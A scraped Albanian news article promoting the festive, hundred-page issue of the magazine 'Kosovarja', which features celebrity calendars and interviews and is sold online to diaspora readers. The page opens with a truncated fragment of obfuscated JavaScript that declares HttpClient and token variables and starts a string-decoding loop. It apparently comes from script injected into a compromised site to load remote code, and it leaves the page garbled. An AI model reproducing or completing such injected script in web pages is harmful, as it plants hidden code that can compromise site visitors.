;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Numri festiv i revistës ‘Kosovarja’, për t’u mos u humbur!

By

Revista “Kosovarja” tashmë ka nxjerrë në treg numrin më të ri, numrin festiv, që llogaritet si special për shkak të temave, 21 kalendarëve me më të njohurit dhe volumit të faqeve që shkon në njëqind.

Kjo magazinë që mbetet më e lexuara, nuk i ka ikur natyrës së saj as këtë herë, duke tentuar sërish sensacionin, ekskluzivitetin dhe risitë. Në njëqind faqet e revistës, lexuesi gjen të renditura një mori temash me përmbajtje interesante nga përditshmëria, përjetime reale që shpesh janë edhe të dhimbshme, intervista me më të famshmit, anketa me qytetarët, lajme dhe shumë të pa thënash që zbulohen për herë të parë.

Flitet për sukseset dhe jetën jashtë skenës, për gjërat më personale e të pa ditura, për emra si Teuta Krasniqi, Ermal Fejzullahu, Enver Idrizi, Adelina Ismaili, Era Istrefi, Ari Blue.

Lexuesit e Diasporës, mund ta blejnë “Kosovaren” origjinale në versionin online në faqen e revistës.  Kjo, është një mundësi që shfrytëzohet masivisht nga mijëra lexues anë e kënd botës.

“Kosovarja” është magazina më jetëgjatë në vend, duke numëruar shumë vite funksionim të suksesshëm.

Artikuj të ngjashëm